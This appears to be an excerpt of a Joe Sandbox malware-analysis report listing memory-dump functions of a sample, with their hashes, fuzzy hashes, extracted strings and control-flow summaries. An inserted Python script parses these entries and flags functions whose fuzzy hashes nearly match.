                                • Instruction ID: 1af214f92a515034c4761c3d9a360ff790d5d78d822cf92d09ab7ddb9421812f
                                • Opcode Fuzzy Hash: be9712c038a5f94661b3eb5ed866fd933ed5b9346e21d5bd0d80dbf6f1c98068
                                • Instruction Fuzzy Hash: 8E71D1B4E002099FDB44DFA5E59859EBFB2FF88301F20852ED80AAB355DB349981CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$Haq
                                • API String ID: 0-903699183
                                • Opcode ID: 829faa9c9fba6a01417d01d5e83ace3ac74525b458c324f2cf96c8e16799eebd
                                • Instruction ID: 1e97e97a4b562cc76ed3cdba54b23c428943bab6bb40e3410ec4415b8be6d8f8
                                • Opcode Fuzzy Hash: 829faa9c9fba6a01417d01d5e83ace3ac74525b458c324f2cf96c8e16799eebd
                                • Instruction Fuzzy Hash: 28025A70A002198FDB14DF69C894BAEBBF6BF88300F248569E945DB395DF349D46CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Xaq$$]q
                                • API String ID: 0-1280934391
                                • Opcode ID: cbfb4e56de887ebf22d7a554961ecdfb2ebc3ccc0e464e47b60f66786c511f88
                                • Instruction ID: 3b5629943134463ac2d905300a323e22cf208e4168b9a7207add535a17a1d356
                                • Opcode Fuzzy Hash: cbfb4e56de887ebf22d7a554961ecdfb2ebc3ccc0e464e47b60f66786c511f88
                                • Instruction Fuzzy Hash: 2BB1D531F002599BDB08AB7A985863E7BE7BFC4750B088D6DE50AD7384DE79D802C791
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Te]q$Te]q
                                • API String ID: 0-3320153681
                                • Opcode ID: d017f902edb11ea568b540aeed6a821f7e9b8d5ffbdeb4009c95b365287c2c90
                                • Instruction ID: 34b96a444a01356ca0dd21eba86bc0708604c0b1144ba3450c3ee99a2ff317c2
                                • Opcode Fuzzy Hash: d017f902edb11ea568b540aeed6a821f7e9b8d5ffbdeb4009c95b365287c2c90
                                • Instruction Fuzzy Hash: 6391C2B4E142498FDB08CFA9C9949DEFBB2BF89300F24942AD415AB265D7349946CF60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Te]q$Te]q
                                • API String ID: 0-3320153681
                                • Opcode ID: cb33bd8c040a6ca57ea70007aebfd79fe5b4bd06910608c2b8389b0120f1dc9e
                                • Instruction ID: 404306aabb262194e9d2dc98f72cee361aa2088aa02186503e208bd3b0bd93f4
                                • Opcode Fuzzy Hash: cb33bd8c040a6ca57ea70007aebfd79fe5b4bd06910608c2b8389b0120f1dc9e
                                • Instruction Fuzzy Hash: B69192B4E142098FDB08CFAAC9949DEFBB2FF89300F24942AD415BB254DB349946CF54
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$$]q
                                • API String ID: 0-403443862
                                • Opcode ID: b346194e6293e0f337b5ad7cf38d58ab5e25f14230169d72d013b28430c7b9a3
                                • Instruction ID: ea422df5b24979f40b0d79566c8d5eb45a2d4629a6bce2b73d242c8f20bdf10a
                                • Opcode Fuzzy Hash: b346194e6293e0f337b5ad7cf38d58ab5e25f14230169d72d013b28430c7b9a3
                                • Instruction Fuzzy Hash: 0971E1B4E002089FDB48DFA5E59859EBFB2FF99301F20852ED80AA7355DB349981CF51
                                APIs
                                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 078CBDC3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CreateProcessUser
                                • String ID:
                                • API String ID: 2217836671-0
                                • Opcode ID: e41c0fd7d6db4b025bd3cc50234bdc2aa4d8c66cd5c8d4f1d42c1d4751bb90a5
                                • Instruction ID: 9281ed4ee8d648b85298a5cd6d371e69918d35301232a595e0cfd5c9219cfeb8
                                • Opcode Fuzzy Hash: e41c0fd7d6db4b025bd3cc50234bdc2aa4d8c66cd5c8d4f1d42c1d4751bb90a5
                                • Instruction Fuzzy Hash: 96512BB190021ADFCF24CF59C844BDDBBB5BF48300F0480AAE908B7250DB759A85CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: kQD
                                • API String ID: 0-3066535408
                                • Opcode ID: 0b8e18360bed80793981b00191b7b4fc5ad4e508d222ad87ed63f9244a8ad402
                                • Instruction ID: ba36fe79d935ac089e459da264362ab157df5719e3cae5519fb3895ba8480cb2
                                • Opcode Fuzzy Hash: 0b8e18360bed80793981b00191b7b4fc5ad4e508d222ad87ed63f9244a8ad402
                                • Instruction Fuzzy Hash: 28C106B4D1520ADFCB04CFA9C5848EEFBB2FF89301B24856AD415AB315D734A986CF94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NG
                                • API String ID: 0-1926143806
                                • Opcode ID: b4c53d6aec3e10180153acd1da163d7fb86f2c244c21cdd2cf5af18b7e05cdc6
                                • Instruction ID: a02f432e39d03573bd0c62d4ae6628fba3af4c3783522b2e96f429402890b7bf
                                • Opcode Fuzzy Hash: b4c53d6aec3e10180153acd1da163d7fb86f2c244c21cdd2cf5af18b7e05cdc6
                                • Instruction Fuzzy Hash: 6D6118B0E252098FCB08CFA9D9406EEFBF2EF89301F24D56AD419A7255D7348A41CF64
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0a3d359b09e9e9fa4d9a74b98a118cfbc836cd4ca9f94159ce267301563b6f6
                                • Instruction ID: cc1ccf1cd62296319bedc922abe1069d0d228550e802f3e3a32528ec6ad03b47
                                • Opcode Fuzzy Hash: c0a3d359b09e9e9fa4d9a74b98a118cfbc836cd4ca9f94159ce267301563b6f6
                                • Instruction Fuzzy Hash: AFC28C70A142298FC755FF78DC8979DBBB2BB88304F8089A9D44DA7344DE385D85CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: 4c45ea54a0cd17adbaee3579a9c1bbcbd2e8dca07539d0ff0db1977a1ab603c1
                                • Instruction ID: 61a1d7beb1f8872204b1c660482b7ebb18d9ff37b6f71512ae5d7d9750959a85
                                • Opcode Fuzzy Hash: 4c45ea54a0cd17adbaee3579a9c1bbcbd2e8dca07539d0ff0db1977a1ab603c1
                                • Instruction Fuzzy Hash: C75192B5E01658CFDB59CFAAC9446DDBBF2AFC9305F14C0AAD409AB264DB345A85CF00
                                Memory Dump Source
                                • Source File: 00000000.00000002.2706427139.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e40000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c07ef183b6d1a1f20d27d8f3794225557eb9846e07f522e15e76c133f000b8e6
                                • Instruction ID: 4d750720d5bcb5e8767fdc8fa06e29001fa40f34dff7d9e4249e23e6591963de
                                • Opcode Fuzzy Hash: c07ef183b6d1a1f20d27d8f3794225557eb9846e07f522e15e76c133f000b8e6
                                • Instruction Fuzzy Hash: 12526934A003458FDB14DF28C844B99B7B2FF89314F2582E9D5586F3A2DB71A986CF81
                                Memory Dump Source
                                • Source File: 00000000.00000002.2706427139.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e40000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3cb001b9d9f684142d228e98935622f4c878911c661848a6923a16f7c84fb940
                                • Instruction ID: 00002d9fea0af357ee921a154ed42f6d3d484bd4d8c807052fad6722151ec1a8
                                • Opcode Fuzzy Hash: 3cb001b9d9f684142d228e98935622f4c878911c661848a6923a16f7c84fb940
                                • Instruction Fuzzy Hash: 1D526B34A003458FDB14DF28C844B99B7B2FF85314F2586E9D5586F3A2DB71A986CF81
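The two 07E40000 entries directly above carry different Instruction IDs but Instruction Fuzzy Hashes that differ in only a few hex positions, which is the kind of pair the "Similarity" fields are meant to surface. The following Python script is an added example for this page and is not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses function entries in the layout used here (three entries from this section are embedded verbatim as constructed sample input), lists the ones the report labelled with an API ID, and flags pairs whose Instruction Fuzzy Hashes agree at most positions. The position-wise agreement score and the 0.9 threshold are assumptions chosen for illustration; the page does not describe how Joe Sandbox computes or compares its fuzzy hashes.

```python
"""Parse Joe Sandbox function entries and flag near-duplicate functions.
Added example, not Joe Sandbox code; the position-wise hash comparison is an
illustrative assumption, not Joe Sandbox's own similarity metric."""
import re
from typing import Dict, List, Tuple

# Constructed sample input: three entries copied in the page's own layout.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: e41c0fd7d6db4b025bd3cc50234bdc2aa4d8c66cd5c8d4f1d42c1d4751bb90a5
• Instruction ID: 9281ed4ee8d648b85298a5cd6d371e69918d35301232a595e0cfd5c9219cfeb8
• Opcode Fuzzy Hash: e41c0fd7d6db4b025bd3cc50234bdc2aa4d8c66cd5c8d4f1d42c1d4751bb90a5
• Instruction Fuzzy Hash: 96512BB190021ADFCF24CF59C844BDDBBB5BF48300F0480AAE908B7250DB759A85CF90
Memory Dump Source
• Source File: 00000000.00000002.2706427139.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7e40000_Xc501VOacR.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c07ef183b6d1a1f20d27d8f3794225557eb9846e07f522e15e76c133f000b8e6
• Instruction ID: 4d750720d5bcb5e8767fdc8fa06e29001fa40f34dff7d9e4249e23e6591963de
• Opcode Fuzzy Hash: c07ef183b6d1a1f20d27d8f3794225557eb9846e07f522e15e76c133f000b8e6
• Instruction Fuzzy Hash: 12526934A003458FDB14DF28C844B99B7B2FF89314F2582E9D5586F3A2DB71A986CF81
Memory Dump Source
• Source File: 00000000.00000002.2706427139.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7e40000_Xc501VOacR.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3cb001b9d9f684142d228e98935622f4c878911c661848a6923a16f7c84fb940
• Instruction ID: 00002d9fea0af357ee921a154ed42f6d3d484bd4d8c807052fad6722151ec1a8
• Opcode Fuzzy Hash: 3cb001b9d9f684142d228e98935622f4c878911c661848a6923a16f7c84fb940
• Instruction Fuzzy Hash: 1D526B34A003458FDB14DF28C844B99B7B2FF85314F2586E9D5586F3A2DB71A986CF81
"""

FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")      # "• Key: Value" bullet lines
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")  # dump base inside Source File


def parse_entries(text: str) -> List[Dict[str, str]]:
    """Split on 'Memory Dump Source' headers; keep each entry's bullet fields
    (empty values stay '') plus the dump base address under 'Base'."""
    entries: List[Dict[str, str]] = []
    for chunk in text.split("Memory Dump Source")[1:]:
        entry: Dict[str, str] = {}
        for line in chunk.splitlines():
            m = FIELD.match(line.strip())
            if m:
                entry[m.group(1).strip()] = m.group(2).strip()
        m = OFFSET.search(entry.get("Source File", ""))
        entry["Base"] = m.group(1).upper() if m else ""
        entries.append(entry)
    return entries


def fuzzy_agreement(a: str, b: str) -> float:
    """Fraction of positions at which two equal-length hex digests agree.
    Assumption: treats the fuzzy hash as positional; the page does not say how
    Joe Sandbox computes or compares it. Mismatched lengths score 0."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a.upper(), b.upper())) / len(a)


def near_duplicates(entries: List[Dict[str, str]],
                    threshold: float = 0.9) -> List[Tuple[int, int, float]]:
    """Pairs of distinct functions (different Instruction ID) whose Instruction
    Fuzzy Hashes agree at >= threshold of positions: candidates for two builds
    of one routine, worth diffing by hand before trusting a per-function verdict."""
    hits: List[Tuple[int, int, float]] = []
    for i, a in enumerate(entries):
        for j in range(i + 1, len(entries)):
            b = entries[j]
            if a.get("Instruction ID") == b.get("Instruction ID"):
                continue  # identical code, nothing to learn from the pair
            score = fuzzy_agreement(a.get("Instruction Fuzzy Hash", ""),
                                    b.get("Instruction Fuzzy Hash", ""))
            if score >= threshold:
                hits.append((i, j, score))
    return hits


def api_functions(entries: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Entries the report labelled with an API ID (a resolved API call inside)."""
    return [e for e in entries if e.get("API ID")]


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for e in api_functions(ents):
        print(f"dump {e['Base']}: function calling {e['API ID']}")
    for i, j, s in near_duplicates(ents):
        print(f"entries {i} and {j} in dump {ents[i]['Base']} agree at {s:.1%}")
```

Run it on the full report text instead of `SAMPLE` to get the same listing for every function entry; the parser only relies on the "Memory Dump Source" header and the "• Key: Value" bullet lines, so it tolerates the "Strings" and "Control-flow Graph" headings interleaved on this page. On the embedded sample the two 07E40000 functions agree at 66 of 70 positions, while the CreateProcessUser function from the 078C0000 dump matches neither.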
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1290141330581a283a66b789d4f0a7a8bdc74a52a3bdb1fb135bfc4f46b82985
                                • Instruction ID: d46f87c55d6623543f125f6e6abf8382fe38977e874c81b278f0010efefdba80
                                • Opcode Fuzzy Hash: 1290141330581a283a66b789d4f0a7a8bdc74a52a3bdb1fb135bfc4f46b82985
                                • Instruction Fuzzy Hash: C1F108B1A1126A8FCB64CF25C98479DFBB6FF99340F1495EAD40EA7254D7709A81CF00
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 72ef224102975f2bcf84ebfe0f8d45cc128fa7e26d282a727186f8cc29f26e20
                                • Instruction ID: 7db7d95363722a06e25df794561b393a770921bf66ad11d659b8f2e6447e4971
                                • Opcode Fuzzy Hash: 72ef224102975f2bcf84ebfe0f8d45cc128fa7e26d282a727186f8cc29f26e20
                                • Instruction Fuzzy Hash: AAA17135E1030A8FCB44DFA0D8949DDBBBAFF89304F158255E519AF2A1DF30A981CB51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc3bedb7601c9277b095e32a4f77bf2b04afae9cef9328424ef6f98b6c5e5a60
                                • Instruction ID: 85dd0fd99881ec2e497ffeda728e4f8a6327f756c3844a4aab7c43271343aaf5
                                • Opcode Fuzzy Hash: bc3bedb7601c9277b095e32a4f77bf2b04afae9cef9328424ef6f98b6c5e5a60
                                • Instruction Fuzzy Hash: 8B519135F402148FD718AF75D89476A7AE2EFC8700F1D8869E60A9B394DFB4AC45CB90
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 867866137e5eba7a10f7d26dc0bd76b87d3a816506fe3346727c054223d4726a
                                • Instruction ID: b7bb9a26cebcb1037819559732a676cbce31ce2126e22950b53c2e154a284c3b
                                • Opcode Fuzzy Hash: 867866137e5eba7a10f7d26dc0bd76b87d3a816506fe3346727c054223d4726a
                                • Instruction Fuzzy Hash: 936147B0E11219DFCB04CFA4D588AAEBBB1FF59304F20852ED412E7250EB749A41CF51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d62dd460c9423caf17960212bce9c75967e33e65dc9f16623bf84b94a49491f
                                • Instruction ID: 7a2e54961a7bccaf834304d2ebf727dbe7ef5183d0fd2274f77a102fc39c597b
                                • Opcode Fuzzy Hash: 8d62dd460c9423caf17960212bce9c75967e33e65dc9f16623bf84b94a49491f
                                • Instruction Fuzzy Hash: 006137B0E11219DFCB08CFA4D588AAEBBB1FF59315F20892ED412E7254EB749A41CF51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b82cbf7d11cd1f461cc3dc3b0733ddbb2012d70ad57fb76290a3446f3f9e448
                                • Instruction ID: ca3bc88146fc12423250bf99381daf8e25eead7c10ee62f32681dc877b98d3bf
                                • Opcode Fuzzy Hash: 4b82cbf7d11cd1f461cc3dc3b0733ddbb2012d70ad57fb76290a3446f3f9e448
                                • Instruction Fuzzy Hash: 0C511AB0D11228CFDB18CFA6D8846DEBBB2FF89310F2485AAD4096B255DB345A85CF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9851666f08f5bd8e85915069f65c9a38c8f4cc93236f349f751c58d776fe38ed
                                • Instruction ID: 0760cdc8e46352bcfa12618f037f94cc0f98ae1b8ad939e984e7bc6a4e27965b
                                • Opcode Fuzzy Hash: 9851666f08f5bd8e85915069f65c9a38c8f4cc93236f349f751c58d776fe38ed
                                • Instruction Fuzzy Hash: 6D31FEB5E016198FDB58CF6ADC44BDEBBB7AFC9200F14C1AAD408A7254DB305945CF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04fa49d05d099f2b9700deb29aee7e5b9ccfb89c415357e309ddc101f62709ef
                                • Instruction ID: 3b9439dce1e4b8d552fb0df9d0d2b086b31e096fea15db8e39ca1193863d1142
                                • Opcode Fuzzy Hash: 04fa49d05d099f2b9700deb29aee7e5b9ccfb89c415357e309ddc101f62709ef
                                • Instruction Fuzzy Hash: 2621C6B1E016188BEB58CF6BD84469EFAF7EBC8200F04C1BAC508A6264EB345A558F51

                                Control-flow Graph: function starting at 2cd8ab0 (basic blocks 2cd8ab0-2cd9039; the block at 2cd8d4f calls 2cd88f8 twice, the call at 2cd8cf3 resolves to 2cdc3a8 or 2cdc397, and the block at 2cd8e8a calls 2cd7790). The rendered graph with its executed / not executed block markings is not reproduced in this text copy.

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                • API String ID: 0-1435242062
                                • Opcode ID: 40b596f2210a90ef1fe14fefcbbca39fb6bf6e08b485f021eca56c4111d19df6
                                • Instruction ID: 7b5f7f06900ad3bb5d7011df47df181be2c5e320c88c1380c5b2ecd2814bd679
                                • Opcode Fuzzy Hash: 40b596f2210a90ef1fe14fefcbbca39fb6bf6e08b485f021eca56c4111d19df6
                                • Instruction Fuzzy Hash: A9125A34A006499FCB24CF69D984AAEBBF6FF88314F148659E505DB2A1DB30ED42CF50

                                Control-flow Graph: function starting at 2cd5d38 (basic blocks 2cd5d38-2cd5f76; the call at 2cd5d41 resolves to 2cd5d29, 2cd5f78 or 2cd5d38 itself, and the block at 2cd5d9f calls 2cd6390). The rendered graph with its executed / not executed block markings is not reproduced in this text copy.

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8aq$tP]q$tP]q$tP]q$$]q$$]q$$]q
                                • API String ID: 0-824007586
                                • Opcode ID: 3a243a414b66d833dc02e0346f33fea51c7cf14d9b8569a8ea194baecc87c46f
                                • Instruction ID: 9c63f7fafa9095df4218fc2f5a4881250fd5327fc32e33f561062e00c7ce1923
                                • Opcode Fuzzy Hash: 3a243a414b66d833dc02e0346f33fea51c7cf14d9b8569a8ea194baecc87c46f
                                • Instruction Fuzzy Hash: 4551F530B003458FD728AB79C884B6ABBE6EFC8740F54C86AD119CB7A5DB39D841C791

                                Control-flow Graph: function starting at 2cdb848 (basic blocks 2cdb848-2cdb976; calls 2cdb0fc from the entry block, 2cdb07c from the block at 2cdb88f and 2cdba58 from the block at 2cdb906). The rendered graph with its executed / not executed block markings is not reproduced in this text copy.

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q
                                • API String ID: 0-2943635446
                                • Opcode ID: 8b8943867aff5bbea821517d21bd7e3bd9828e0a5ba010a26d51ef786851ff55
                                • Instruction ID: 61420fcf193c96c32a1888bd3fd152c3023f5671a15273261328d0e1872817a8
                                • Opcode Fuzzy Hash: 8b8943867aff5bbea821517d21bd7e3bd9828e0a5ba010a26d51ef786851ff55
                                • Instruction Fuzzy Hash: 50310470E402098BDB289F6EC4587AEBAF6BF88714F248929D552A7384CF744C85CB91

                                Control-flow Graph: function starting at 2cdb838 (basic blocks 2cdb838-2cdb976, sharing its body with the 2cdb848 function above; calls 2cdb0fc from the entry block, 2cdb07c from the block at 2cdb88f and 2cdba58 from the block at 2cdb906). The rendered graph with its executed / not executed block markings is not reproduced in this text copy.

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH]q$Te]q$Te]q$Te]q$Te]q
                                • API String ID: 0-3341053991
                                • Opcode ID: cad5f47e7f9e7d396a5426da8168ec7402898b9a0fe0db219f717749487c1353
                                • Instruction ID: 64fe6ee6118fdab0669d17deae350c6662f5d91cb3ffa8e1e58d1ffb8a18e95c
                                • Opcode Fuzzy Hash: cad5f47e7f9e7d396a5426da8168ec7402898b9a0fe0db219f717749487c1353
                                • Instruction Fuzzy Hash: 3431E130E40209DBDB289F7AC4587AEBAF2BF88714F248929D552A7380CF744C85CB91

                                Control-flow Graph: function starting at 2cd5d29 (basic blocks 2cd5d29-2cd5f76, sharing its body with the 2cd5d38 function above; the call at 2cd5d41 resolves to 2cd5d29 itself, 2cd5f78 or 2cd5d38, and the block at 2cd5d9f calls 2cd6390). The rendered graph with its executed / not executed block markings is not reproduced in this text copy.

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: tP]q$tP]q$$]q$$]q
                                • API String ID: 0-1338969139
                                • Opcode ID: 0bee0c594e1f1581914be4dba23df92b66ea3c732c482a909026ba47cab427d5
                                • Instruction ID: 897441839292743e3cab84ae9426a1bc5ee31e10e843e7cffa14c337c89d6731
                                • Opcode Fuzzy Hash: 0bee0c594e1f1581914be4dba23df92b66ea3c732c482a909026ba47cab427d5
                                • Instruction Fuzzy Hash: 32310731B003509FE7387A79C88473AB6E7BBC4B80F14C82AD5554BB98CB799881C791
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq$(aq$(aq
                                • API String ID: 0-2593664646
                                • Opcode ID: dc7f99fc55b4cbf7a3a2ddad800cd69cb331b457d6c5661c84fdc08baae49462
                                • Instruction ID: b0cbb52def24c7a424ef2933bb403815eea2bcf21d522d90c59db4342dfc85eb
                                • Opcode Fuzzy Hash: dc7f99fc55b4cbf7a3a2ddad800cd69cb331b457d6c5661c84fdc08baae49462
                                • Instruction Fuzzy Hash: A5A1AD70E103098FCB14DFA9C45479EBBF2EF89311F24856EE805AB391DB74A985CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$TJbq$Te]q
                                • API String ID: 0-2800237591
                                • Opcode ID: 92415c6e758ae373c85fbb26c3aa28beee769e66e5ace63aad1d960ca0fc1f14
                                • Instruction ID: fd4580187cc56f1d0a8c0c28ac2106adb1373a93c6d81bc81493c64087dc925e
                                • Opcode Fuzzy Hash: 92415c6e758ae373c85fbb26c3aa28beee769e66e5ace63aad1d960ca0fc1f14
